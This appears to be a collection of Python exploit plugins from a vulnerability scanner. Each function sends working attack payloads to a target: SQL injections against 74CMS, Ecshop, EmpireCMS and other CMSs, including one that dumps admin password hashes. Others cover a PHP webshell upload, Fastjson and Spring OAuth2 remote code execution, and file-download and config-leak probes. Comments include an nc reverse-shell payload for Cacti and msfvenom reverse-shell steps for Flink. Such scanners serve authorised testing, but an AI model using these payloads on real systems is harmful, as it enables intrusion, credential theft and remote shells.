def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_user.php?act=check_email" data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = '/chanzhi/admin.php?m=package&f=upload' verify = '/chanzhi/system/tmp/package/php.php' payload_url = url + payload verify_url = url + verify data = """ ------WebKitFormBoundaryGgFOYWAluy1F8lvn Content-Disposition: form-data; name="file"; filename="php.php" Content-Type: text/php <?php echo md5(c);> ------WebKitFormBoundaryGgFOYWAluy1F8lvn-- """ requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) resp = requests.get(verify_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: payload_url = url DL = Dnslog() # DL="777777777777.h3me6i.dnslog.cn" data = '''{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://%s/Exploit", "autoCommit": true } } ''' % DL.dns_host() Headers['Content-Type'] = 'application/json' Headers["Connection"] = "close" resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/upload/admin/admin_baiduxml.php?ac=setsave' data = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("Error:Query error") != -1 and con.find( "value='aaa'") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/upload/admin/admin_category.php?ac=edit_color_save' data = "val=xx&id=1 union select md5(c),2,3,4" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)" data = "status=1&order_sn=2" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("ca4238a0b923820dcc509a6f75849") != -1: Medusa = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23" #用EXP可以获取密码和账户 EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('5cee14937d463a819651c8e1c504613c') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/graph_realtime.php?action=init" payload_url = scheme + "://" + url + ":" + str(port) + payload #如果要反弹shell 把IP 和port改为反弹的目标即可 #然后请求里面价格cookie值 # from urllib.parse import quote # cookies = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) # cookies = {'Cacti': quote(payload)} headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("poller_realtime.php") != -1: Medusa = "{}存在Cacti任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/ikaimi/rolling/list.php?line=10&page=&classid=10)%20UNION%20ALL%20SELECT%20CONCAT(0x71786a7171,md5(123),0x716a6b6b71),NULL,NULL,NULL,NULL--%20' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("202cb962ac59075b964b07152d234b70") != -1: Medusa = "{}存在EmpireCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/ecshop/api.php" data = "return_data=json&ac=1&ac=search_goods_list&api_version=1.0&last_modify_st_time=1&pages=1&counts=1 UNION ALL SELECT NULL,CONCAT(0x20,IFNULL(CAST(md5(c) AS CHAR),0x20),0x20)#" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa( **kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)" payload_url = url + payload resp = requests.get(payload_url,headers=Headers,timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33")!= -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('log4jConfigLocation') != -1 : Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#" payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 : Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url=kwargs.get("Url")#获取传入的url参数 Headers=kwargs.get("Headers")#获取传入的头文件 proxies=kwargs.get("Proxies")#获取传入的代理参数 url=PortReplacement(url,888) try: payload = '/pma/' payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("phpMyAdmin")!=-1 and con.find("sql")!=-1 and con.find("New")!=-1: Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url,payload_url,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) try: payload = '/sftp-config.json' payload_url = Url+ payload Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" Headers["Accept-Encoding"] = "gzip, deflate" resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code==200 and con.lower().find('remote_path')!=-1: Medusa = "{}存在Sftp信息泄露漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(Url,payload_url,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, Url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(Url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+Url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") Headers=kwargs.get("Headers") proxies = kwargs.get("Proxies") try: payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect"+"%201,2,3,md5(7836457),5,6,7,8,9%23" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code==200 and con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1 : Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/user/?q=help&type=search&page=1&kw=-1%22)%20UNION%20ALL%20SELECT%201,2,3,concat(0x7c,MD5(1)),5,6,7%23" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code==200 and con.find("c4ca4238a0b923820dcc509a6f75849b")!= -1: Medusa = "{}存在eYouSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def Git(self, url): Algroup = "GitVersionManagementSourceLeakVulnerability" Name = "Git版本管理源码泄露漏洞" Affects = "Git" urls = url + '/.git/config' try: resp = self.GetRequest(urls) con = resp.text code = resp.status_code if code == 200 and con.lower().find( 'repositoryformatversion') != -1: Medusa = "{}存在{}\r\n漏洞详情:{}\r\n".format(urls, Name, con) _t = TargetInfo(Medusa, Algroup, Name, Affects) VulnerabilityDetails(_t.info, urls, self.Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(self.TargetUrl), str(Medusa)) except Exception as e: _l = ErrorLog().Write(url, Name) # 调用写入类传入URL和错误插件名 _ = TargetInfo('', Algroup, Name, Affects).info.get('algroup') ErrorHandling().Outlier(e, _)
def medusa(**kwargs)->None: url=kwargs.get("Url")#获取传入的url参数 Headers=kwargs.get("Headers")#获取传入的头文件 proxies=kwargs.get("Proxies")#获取传入的代理参数 try: payload_url=url+'/jar/upload' getshell="msfvenom -p java/shell_reverse_tcp lhost=you_ip lport=5555 -f jar >/root/Desktop/shell.jar\r\n生成jar包后在主页找到Submit New Job位置上传jar包\r\n最后点进上传好的jar包后再点击Submit即可在nc上getshell" resp = requests.get(payload_url,headers=Headers,proxies=proxies, timeout=6, verify=False) con=resp.text code=resp.status_code if con.find("Unable to load requested file /jar/upload")!=-1 and code==404: Medusa = "{}存在Flink未授权命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回内容:{}\r\nGetshell方法:\r\n{}\r\n".format(url,payload_url,resp.text,getshell) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = '/enableq/enableq91_php52/Export/Export.log.inc.php?ExportSQL=U0VMRUNUIGEuKixjb25jYXQoTUQ1KDEpLCc6JyxkYXRhYmFzZSgpKSBhcyBhZG1pbmlzdHJhdG9yc05hbWUgRlJPTSBlcV9hZG1pbmlzdHJhdG9yc2xvZyBhLCBlcV9hZG1pbmlzdHJhdG9ycyBiIFdIRVJFIGEuYWRtaW5pc3RyYXRvcnNJRD1iLmFkbWluaXN0cmF0b3JzSUQgT1JERVIgQlkgYS5hZG1pbmlzdHJhdG9yc0xvZ0lEIERFU0M=' payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1 : Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1 : Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: DL=Dnslog() payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host()) payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
